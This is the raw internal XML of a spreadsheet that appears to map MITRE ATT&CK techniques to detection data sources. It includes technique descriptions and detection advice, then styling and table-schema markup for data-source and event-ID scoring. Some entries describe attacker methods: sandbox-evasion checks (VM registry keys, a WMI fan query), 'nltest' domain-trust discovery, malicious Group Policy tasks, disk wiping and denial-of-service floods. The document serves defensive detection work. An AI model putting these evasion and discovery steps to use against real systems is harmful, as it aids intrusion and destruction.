Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file. (Citation: subTee WMIC XSL APR 2018) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1117)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool.
Command-line examples: (Citation: subTee WMIC XSL APR 2018)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</si>
  <si>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</si>
  <si>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</si>
  <si>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[PowerShell](https://attack.mitre.org/techniques/T1086)), or other suspicious actions that could relate to post-compromise behavior.</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</si>
  <si>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[Scripting](https://attack.mitre.org/techniques/T1064)). Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193)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</si>
  <si>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File Permissions Modification</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify DACLs and file ownership, such as use of icacls (Citation: Microsoft icacls OCT 2017), takeown (Citation: Microsoft takeown OCT 2017), attrib (Citation: Microsoft attrib OCT 2017), and [PowerShell](https://attack.mitre.org/techniques/T1086) Set-Acl (Citation: Microsoft SetAcl) in Windows and chmod (Citation: Linux chmod)/chown (Citation: Linux chown) in macOS/Linux. Many of these are built-in system utilities and may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Consider enabling file permission change auditing on folders containing key binary/configuration files. Windows Security Log events (Event ID 4670) are used when DACLs are modified. (Citation: EventTracker File Permissions Feb 2014)</t>
  </si>
  <si>
    <t>File permissions are commonly managed by discretionary access control lists (DACLs) specified by the file owner. File DACL implementation may vary by platform, but generally explicitly designate which users/groups can perform which actions (ex: read, write, execute, etc.). (Citation: Microsoft DACL May 2018) (Citation: Microsoft File Rights May 2018) (Citation: Unix File Permissions)
Adversaries may modify file permissions/attributes to evade intended DACLs. (Citation: Hybrid Analysis Icacls1 June 2018) (Citation: Hybrid Analysis Icacls2 May 2018) Modifications may include changing specific access rights, which may require taking ownership of a file and/or elevated permissions such as Administrator/root depending on the file's existing permissions to enable malicious activity such as modifying, replacing, or deleting specific files. Specific file modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1015), [Logon Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Compiled HTML files (.chm)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Adversaries may abuse this technology to conceal malicious code. A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)</t>
  </si>
  <si>
    <t>T1480</t>
  </si>
  <si>
    <t>Execution Guardrails</t>
  </si>
  <si>
    <t>Detecting the action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</si>
  <si>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Execution guardrails constrain execution or actions based on adversary supplied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
Environmental keying is one type of guardrail that includes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guardrails and environmental keying to help protect their TTPs and evade detection. For example,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In general, guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) where a decision can be made not to further engage because the value conditions specified by the adversary are meant to be target specific and not such that they could occur in any environment.</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>Domain Trust Discovery</t>
  </si>
  <si>
    <t>PowerShell logs,API monitoring,Process command-line parameters,Process monitoring</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</si>
  <si>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&lt;code&gt;nltest /domain_trusts&lt;/code&gt;.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[PowerShell](https://attack.mitre.org/techniques/T1086). The .NET method GetAllTrustRelationships() can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships)
</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information on domain trust relationships that may be used to identify [Lateral Movement](https://attack.mitre.org/tactics/TA0008)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Injection](https://attack.mitre.org/techniques/T1178), [Pass the Ticket](https://attack.mitre.org/techniques/T1097), and [Kerberoasting](https://attack.mitre.org/techniques/T1208).(Citation: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</si>
  <si>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T1483</t>
  </si>
  <si>
    <t>Domain Generation Algorithms</t>
  </si>
  <si>
    <t>Process use of network,Packet capture,Network device logs,Netflow/Enclave netflow,DNS records</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</si>
  <si>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or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)</t>
  </si>
  <si>
    <t>Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination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</si>
  <si>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T1484</t>
  </si>
  <si>
    <t>Group Policy Modification</t>
  </si>
  <si>
    <t xml:space="preserve">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 </t>
  </si>
  <si>
    <t xml:space="preserve">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[Scheduled Task](https://attack.mitre.org/techniques/T1053), [Disabling Security Tools](https://attack.mitre.org/techniques/T1089), [Remote File Copy](https://attack.mitre.org/techniques/T1105),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Publicly available scripts such as &lt;code&gt;New-GPOImmediateTask&lt;/code&gt; can be leveraged to automate the creation of a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053)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t>
  </si>
  <si>
    <t>T1485</t>
  </si>
  <si>
    <t>Data Destruction</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Process monitoring</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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may destroy data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Wipe](https://attack.mitre.org/techniques/T1488) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487)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2017)(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>impact</t>
  </si>
  <si>
    <t>T1486</t>
  </si>
  <si>
    <t>Data Encrypted for Impact</t>
  </si>
  <si>
    <t>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of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</si>
  <si>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[Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)</t>
  </si>
  <si>
    <t>T1487</t>
  </si>
  <si>
    <t>Disk Structure Wipe</t>
  </si>
  <si>
    <t>Kernel drivers,MBR</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>Adversaries may corrupt or wipe the disk data structures on hard drive necessary to boot systems; targeting specific critical systems as well as a large number of systems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Wipe](https://attack.mitre.org/techniques/T1487) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1488) if all sectors of a disk are wiped.
To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>T1488</t>
  </si>
  <si>
    <t>Disk Content Wipe</t>
  </si>
  <si>
    <t>Kernel drivers,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems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[Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>T1489</t>
  </si>
  <si>
    <t>Service Stop</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Windows Registry,API monitoring</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
Monitor Registry edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;.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</si>
  <si>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</si>
  <si>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T1490</t>
  </si>
  <si>
    <t>Inhibit System Recovery</t>
  </si>
  <si>
    <t>Windows Registry,Services,Windows event logs,Process command-line parameters,Process monitoring</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1491</t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
    <t>Packet capture,Web application firewall logs,Web logs,Packet capture</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</si>
  <si>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</si>
  <si>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 xml:space="preserve">Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. 
### Internal
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Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages. While internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)
### External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Defacement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t>
  </si>
  <si>
    <t>T1492</t>
  </si>
  <si>
    <t>Stored Data Manipulation</t>
  </si>
  <si>
    <t>Application logs,File monitoring</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.</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</si>
  <si>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</si>
  <si>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T1493</t>
  </si>
  <si>
    <t>Transmitted Data Manipulation</t>
  </si>
  <si>
    <t>Packet capture,Network protocol analysis</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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T1494</t>
  </si>
  <si>
    <t>Runtime Data Manipulation</t>
  </si>
  <si>
    <t>Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.</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</si>
  <si>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Association](https://attack.mitre.org/techniques/T1042)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</si>
  <si>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T1495</t>
  </si>
  <si>
    <t>Firmware Corruption</t>
  </si>
  <si>
    <t>BIOS,Component firmware</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.</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</si>
  <si>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</si>
  <si>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T1496</t>
  </si>
  <si>
    <t>Resource Hijacking</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Network protocol analysis,Network device logs</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1497</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion</t>
  </si>
  <si>
    <t xml:space="preserve">Virtualization, sandbox,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[Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.
</t>
  </si>
  <si>
    <t>Adversaries may check for the presence of a virtual machine environment (VME) or sandbox to avoid potential detection of tools and activities. If the adversary detects a VME, they may alter their malware to conceal the core functions of the implant or disengage from the victim. They may also search for VME artifacts before dropping secondary or additional payloads. 
Adversaries may use several methods including [Security Software Discovery](https://attack.mitre.org/techniques/T1063) to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) by searching for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) to help determine if it is an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandboxes. (Citation: Unit 42 Pirpi July 2015)
###Virtual Machine Environment Artifacts Discovery###
Adversaries may use utilities such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1086), [Systeminfo](https://attack.mitre.org/software/S0096), and the [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, and/or the Registry. Adversaries may use [Scripting](https://attack.mitre.org/techniques/T1064) to combine these checks into one script and then have the program exit if it determines the system to be a virtual environment. Also, in applications like VMWare, adversaries can use a special I/O port to send commands and receive output. Adversaries may also check the drive size. For example, this can be done using the Win32 DeviceIOControl function. 
Example VME Artifacts in the Registry(Citation: McAfee Virtual Jan 2017)
* &lt;code&gt;HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions&lt;/code&gt;
* &lt;code&gt;HKLM\HARDWARE\Description\System\”SystemBiosVersion”;”VMWARE”&lt;/code&gt;
* &lt;code&gt;HKLM\HARDWARE\ACPI\DSDT\BOX_&lt;/code&gt;
Example VME files and DLLs on the system(Citation: McAfee Virtual Jan 2017)
* &lt;code&gt;WINDOWS\system32\drivers\vmmouse.sys&lt;/code&gt; 
* &lt;code&gt;WINDOWS\system32\vboxhook.dll&lt;/code&gt;
* &lt;code&gt;Windows\system32\vboxdisp.dll&lt;/code&gt;
Common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017)
###User Activity Discovery###
Adversaries may search for user activity on the host (e.g., browser history, cache, bookmarks, number of files in the home directories, etc.) for reassurance of an authentic environment. They might detect this type of information via user interaction and digital signatures. They may have malware check the speed and frequency of mouse clicks to determine if it’s a sandboxed environment.(Citation: Sans Virtual Jan 2016) Other methods may rely on specific user interaction with the system before the malicious code is activated. Examples include waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) and waiting for a user to double click on an embedded image to activate (Citation: FireEye FIN7 April 2017).
###Virtual Hardware Fingerprinting Discovery###
Adversaries may check the fan and temperature of the system to gather evidence that can be indicative a virtual environment. An adversary may perform a CPU check using a WMI query &lt;code&gt;$q = “Select * from Win32_Fan” Get-WmiObject -Query $q&lt;/code&gt;. If the results of the WMI query return more than zero elements, this might tell them that the machine is a physical one. (Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>defense-evasion,discovery</t>
  </si>
  <si>
    <t>T1498</t>
  </si>
  <si>
    <t>Network Denial of Service</t>
  </si>
  <si>
    <t>Sensor health and status,Network protocol analysis,Netflow/Enclave netflow,Network intrusion detection system,Network device logs</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</si>
  <si>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</si>
  <si>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Many different methods to accomplish such network saturation have been observed, but most fall into two main categories: Direct Network Floods and Reflection Amplification.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attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)
For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).
###Direct Network Flood###
Direct Network Floods are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for Direct Network Floods. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
###Reflection Amplification###
Adversaries may amplify the volume of their attack traffic by using Reflection.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</si>
  <si>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T1499</t>
  </si>
  <si>
    <t>Endpoint Denial of Service</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Web logs,Web application firewall logs,Network intrusion detection system,Network protocol analysis,Network device logs,Netflow/Enclave netflow</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</si>
  <si>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</si>
  <si>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the Network Denial of Service Technique [Network Denial of Service](https://attack.mitre.org/techniques/T1498).
### OS Exhaustion Flood
Since operating systems (OSs) are responsible for managing the finite resources on a system, they can be a target for DoS.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 SYN Flood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 ACK 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 Service Exhaustion Flood
Different network services provided by systems are targeted in different ways to conduct a DoS. Adversaries often target DNS and web servers, but other services have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
#### Simple HTTP Flood
A large number of HTTP requests can be issued to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)
#### SSL Renegotiation Attack
SSL Renegotiation Attacks take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 Application Exhaustion Flood
Web applications that sit on top of web server stacks can be targeted for DoS. Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)
### Application or System Exploitation
Software vulnerabilities exist that when exploited can cause an application or system to crash and deny availability to users.(Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.</t>
  </si>
  <si>
    <t>T1500</t>
  </si>
  <si>
    <t>Compile After Delivery</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,File monitoring</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</si>
  <si>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</si>
  <si>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 xml:space="preserve">Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027),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[Spearphishing Attachment](https://attack.mitre.org/techniques/T1193). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
</t>
  </si>
  <si>
    <t>T1501</t>
  </si>
  <si>
    <t>Systemd Service</t>
  </si>
  <si>
    <t>Linux</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</si>
  <si>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</si>
  <si>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Systemd services can be used to establish persistence on a Linux system.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recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)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</si>
  <si>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30;25;30;15</t>
  </si>
  <si>
    <t>20;20;15;20;25</t>
  </si>
  <si>
    <t>25;30;25;20</t>
  </si>
  <si>
    <t>35;35;20;10</t>
  </si>
  <si>
    <t>10;15;15;15;15;15;15</t>
  </si>
  <si>
    <t>DNS Records</t>
  </si>
  <si>
    <t>Component firmware</t>
  </si>
  <si>
    <t>Digital Certificate Validation</t>
  </si>
  <si>
    <t>Access Tokens</t>
  </si>
  <si>
    <t>Named Pipes</t>
  </si>
  <si>
    <t>Detonation Chamber</t>
  </si>
  <si>
    <t>Disk Forensics</t>
  </si>
  <si>
    <t>Windows DNS log</t>
  </si>
  <si>
    <t xml:space="preserve">Infoblox </t>
  </si>
  <si>
    <t>Web application firewall logs</t>
  </si>
  <si>
    <t>Web logs</t>
  </si>
  <si>
    <t>Web proxy</t>
  </si>
  <si>
    <t>BlueCoat trafficlog</t>
  </si>
  <si>
    <t>Nginx logs</t>
  </si>
  <si>
    <t>F5 logs</t>
  </si>
  <si>
    <t>FireEye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</si>
</sst>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1"/>
      <color rgb="FF0C1B33"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="0"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF0C1B33"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF333333"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>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0C1B33"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8" tint="0.39994506668294322"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="4">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color theme="4"/>
      </left>
      <right/>
      <top style="thin">
        <color theme="4"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color theme="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4" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="41">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0"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0" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5"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center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="1" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="0" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="6" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6"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3" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="1" fontId="3" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="164" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="2">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
    <cellStyle name="Rated" xfId="1"/>
  </cellStyles>
  <dxfs count="19">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theme="4"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color theme="1"/>
        <name val="Consolas"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="none">
          <fgColor indexed="64"/>
          <bgColor indexed="65"/>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alignment horizontal="center" vertical="center" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <border outline="0">
        <top style="thin">
          <color theme="4"/>
        </top>
      </border>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left"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s>
  <tableStyles count="0" defaultTableStyle="TableStyleMedium2" defaultPivotStyle="PivotStyleLight16"/>
  <colors>
    <mruColors>
      <color rgb="FF0C1B33"/>
      <color rgb="FF2C578C"/>
      <color rgb="FF1F3F64"/>
      <color rgb="FF76A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F1048576" totalsRowShown="0" headerRowDxfId="18" dataDxfId="17">
  <autoFilter ref="A1:F1048576"/>
  <tableColumns count="6">
    <tableColumn id="1" name="DataSource"/>
    <tableColumn id="2" name="Event"/>
    <tableColumn id="3" name="Completeness" dataDxfId="16"/>
    <tableColumn id="4" name="Timeliness" dataDxfId="15"/>
    <tableColumn id="5" name="Availability" dataDxfId="14"/>
    <tableColumn id="6" name="Score" dataDxfId="13"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="1" showLastColumn="1" showRowStripes="1" showColumnStripes="1"/>
</table>
</file>

<file path=xl/tables/table2.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="2" name="Table2" displayName="Table2" ref="A1:E1048575" totalsRowShown="0" headerRowDxfId="12" tableBorderDxfId="11">
  <autoFilter ref="A1:E1048575"/>
  <sortState ref="A2:E198">
    <sortCondition ref="A1:A1048575"/>
  </sortState>
  <tableColumns count="5">
    <tableColumn id="2" name="EventID" dataDxfId="10"/>
    <tableColumn id="3" name="Event Description"/>
    <tableColumn id="4" name="Log Name"/>
    <tableColumn id="5" name="Verbosity Signal"/>
    <tableColumn id="6" name="Detection Relevance"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="1" showLastColumn="0" showRowStripes="1" showColumnStripes="1"/>
</table>
</file>

<file path=xl/tables/table3.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="4" name="Table4" displayName="Table4" ref="A1:G1048576" totalsRowShown="0" headerRowDxfId="9" dataDxfId="8" tableBorderDxfId="7">
  <autoFilter ref="A1:G1048576"/>
  <tableColumns count="7">
    <tableColumn id="1" name="ID" dataDxfId="6"/>
    <tableColumn id="2" name="Data Source" dataDxfId="5"/>
    <tableColumn id="3" name="Weight" dataDxfId="4"/>
